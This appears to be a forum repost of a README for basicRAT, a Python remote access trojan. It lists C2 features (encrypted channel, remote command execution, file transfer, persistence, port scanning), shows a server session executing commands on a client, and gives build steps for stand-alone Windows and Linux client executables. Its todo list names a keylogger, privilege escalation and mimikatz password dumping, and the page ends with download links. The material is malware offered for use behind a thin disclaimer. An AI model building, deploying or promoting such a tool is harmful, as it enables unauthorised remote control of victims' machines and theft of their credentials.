BasicRAT(Password dumping)
BasicRAT(Password dumping)
This is a Python RAT (Remote Access Trojan), basicRAT was created to maintain a clean design full-featured Python RAT. Currently a work in progress and still being hacked on.
Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. Accessing a computer system or network without authorization or explicit permission is illegal.
Features
Cross-platform
AES GCM encrypted C2 with D-H exchange
Accepts connection from multiple clients
Command execution
File upload/download
Standard utilities (wget, unzip)
System survey
Usage
$ python basicRAT_server.py --port 1337
basicRAT server listening for connections on port 1337.
[?] basicRAT> help
client <id> - Connect to a client.
clients - List connected clients.
download <files> - Download file(s).
execute <command> - Execute a command on the target.
help - Show this help menu.
kill - Kill the client connection.
persistence - Apply persistence mechanism.
quit - Exit the server and end all client connections.
rekey - Regenerate crypto key.
scan <ip> - Scan top 25 ports on a single host.
survey - Run a system survey.
unzip <file> - Unzip a file.
upload <files> - Upload files(s).
wget <url> - Download a file from the web.
[?] basicRAT> clients
ID - Client Address
1 - 127.0.0.1
[?] basicRAT> client 1
[1] basicRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux
Build a stand-alone executable
Keep in mind that before building you will likely want to modify both the HOST and PORT variables located at the top of basicRAT_client.py to fit your needs.
On Linux you will need Python 2.x, PyInstaller, and pycrypto. Then run something like pyinstaller2 --onefile basicRAT_client.py and it should generate a dist/ folder that contains a stand-alone ELF executable.
On Windows you will need Python 2.x, PyInstaller, pycrypto, pywin32, and pefile. Then run something like C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile basicRAT_client.py and it should generate a dist/ folder that contains a stand-alone PE (portable executable).
Todo
Client binary generation tool (cross-platform)
Pyinstaller
Switch options for remote IP, port, etc
Persistance (cross-platform)
Windows: Registry keys, WMIC, Startup Dir
Linux: Cron jobs, services, modprobe
Common C2 Protocols (HTTP, DNS)
Privilege Escalation (getsystem-esque, dirty cow)
Screenshot
Keylogger
Expand toolkit (unrar, sysinfo)
Scanning utility (probe scan / ping sweep, scanning subnet)
Password dumping (mimikatz / gsecdump)
Tunneling
Client periodic connection attempt
Download Link
Download Link
[/CENTER]